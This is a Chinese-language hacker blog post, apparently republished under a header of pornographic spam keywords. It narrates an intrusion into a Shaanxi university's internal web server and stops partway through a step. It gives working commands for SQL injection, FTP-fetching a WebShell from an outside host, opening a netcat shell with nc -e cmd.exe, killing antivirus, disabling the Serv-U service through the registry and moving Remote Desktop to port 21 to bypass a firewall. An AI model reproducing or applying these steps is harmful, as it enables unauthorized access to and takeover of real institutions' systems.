日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

  1. 首頁 > 云知道 > >

偷天換日之入侵陜西某高校內(nèi)部網(wǎng)

云知道

最近黑防上面有很多如何入侵高校網(wǎng)站的文章,大都是進行的注入攻擊 。呵呵,為了迎合大眾所趨,我也進入一些高校網(wǎng)站玩了玩 。這不,這次就發(fā)現(xiàn)了一個陜西高校里面一個網(wǎng)站的注入漏洞,不過獲取最高權限還真費了一翻勁 。
第一步:發(fā)現(xiàn)注入漏洞在它的一個新聞顯示頁面的聯(lián)接上加一個,呵呵,可以注入!看看是什么權限的,在后面在加一個 and user>0 顯示有dbo的字樣,暈,竟然可以擁有SA的權限,唉,真不知道管理員是怎么搞的!先不管這些,拿出明小子的domain,現(xiàn)在的版本到了3.5了(和其他注入工具相比,domain用起來還是比較順手的,不過命令回顯有點糟糕) 。既然發(fā)現(xiàn)了注入點,那么開始干活吧!
第二步:上傳文件既然現(xiàn)在有了sa的權限,那么就可以執(zhí)行管理員權限的命令了 。不過因為一般工具的回顯都很糟糕(至少我用NBSI,domain等都有這樣的問題),所以還是先搞個WebShell上去再說吧 。首先需要找到web根目錄,不然WebShell放哪啊?!在domain的命令行下多dir幾次就可以找到了,根據(jù)一般人的習慣,根目錄不會太深,取的文件名和網(wǎng)站多少有點關系 。估計沒有幾個管理員會把根目錄名取得很怪異并且放在層次很深的地方(這是管理員都有的通病,怕麻煩,圖方便,可是方便了自己也方便了我們,嘿嘿) 。很快就可以找到根目錄為 d:/ccs 。那么就上傳WebShell 吧!可是這幾個注入工具的上傳功能都有點問題,要么傳小文件沒問題,傳大了就不行了!要么根本沒傳上去了,現(xiàn)成的工具沒法上傳了,咋辦?不怕不怕,總不能在一棵樹上吊死吧!用ftp下載!在domain的命令行下依次輸入下列語句:echo open showff.51.net>>c:ftpecho showff>>c:ftpecho 123456>>c:ftpecho cd public_html>>c:ftpecho get WebShell.asp d:ccsindex_admin.asp>>c:ftpecho bye>>c:ftp當然首先你要有一個FTP的空間,我用的虎翼的FTP,速度很快 。這樣在服務器c盤上就生成了一個名為ftp的文件內(nèi)容就是剛輸入的東東 。命令行下輸入ftp -s:c:ftp,點擊執(zhí)行,這樣一個 WebShell就下載到我們可愛的肉雞上了 。瀏覽器輸入地址查看進入我們的WebShell 里面去,我們下載的海洋2006,功能強大,好用.到現(xiàn)在為止,如果只是想活動WebShell的話似乎就夠了,海陽的WebShell可以干很多事情了 。但是我們的目標是進一步獲取更大的權限 。
第三步:偷天換日更換服務用WebShell上傳一個nc,然后在domain的命令行里面執(zhí)行 nc-e cmd.exe –l –p 43958,在自己的電腦上執(zhí)行telnet xxx.xxx.edu.cn 43958沒有任何反應,顯示為”不能連接到主機”這樣的字樣 。很好,很正常,服務器里面沒有殺毒軟件和防火墻軟件才怪了 。為了進一步證實這點,在domain里面執(zhí)行netstat –a,根據(jù)返回結果我又telnet了幾個打開的端口.其中80端口和21端口開了,都可以訪問到,其他的端口根本沒法使用!那么就用pslist和pskill把相關的殺毒軟件和防火墻關了唄!呵呵,當然我也這么做了,但事實上沒那么簡單 。這臺服務器上雖然有瑞星防火墻,但是關了之后當我再次telnet遠處的nc時根本沒有反應,這是為什么呢?(沉思了幾秒)呵呵,其實很簡單的,因為這是一個學校的里面的內(nèi)部網(wǎng)站,八成在這臺服務器的周圍存在著其他類型的防火墻或者網(wǎng)關之類的東西,只允許外部訪問這臺服務器的80和21端口 。可是80和21端口都被占用了,難道我們就沒法使用我們自己的木馬或者獲取3389遠程控制權嗎?非也!看我來施展偷天換日大法!首先我們要意識到80端口必須存在不然很快就會被發(fā)現(xiàn)被黑,那么只能拿21端口下手了 。一般只是管理員使用文件上傳而已,暫時可以不被發(fā)現(xiàn)的 。用net start命令查看發(fā)現(xiàn)對方使用的Serv-U的FTP服務器 。Step one:設法使Serv-U服務禁止,這樣它就不能開機自動運行而占用21端口了 。方法如下:編輯一個reg文件,內(nèi)容如下:REGEDIT4[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesServ-U]Start=dword:00000004注意REGEDIT4下面要有一空行 。Start為2是自動,3是手動,4是禁止 。這和服務里面的設置是一一對應的 。保存為a.reg文件,用WebShell上傳至服務器的d:/ccs/index/a.reg,使用domain運行 regedit /s d:/ccs/index/a.reg 這樣Serv-U服務就被禁止了 。隨后用在domain里面使用命令net stop serv-u將現(xiàn)有的ftp進程關掉 。Step two:修改Terminal遠程登錄的端口號 。原本是3389的,現(xiàn)在要改為21 ??梢跃庉嬜员硇薷?,也可以直接運行3389端口修改器類似這樣的程序 。我使用x3389程序修改 。直接上傳至服務器,在domain里面執(zhí)行x3389.exe 21即可 。隨后設法開啟3389服務,網(wǎng)上有很多這樣的方法,這里不說了 。如果想使Terminal服務總是開機自動運行,還需要編輯一reg文件內(nèi)容如下:

推薦閱讀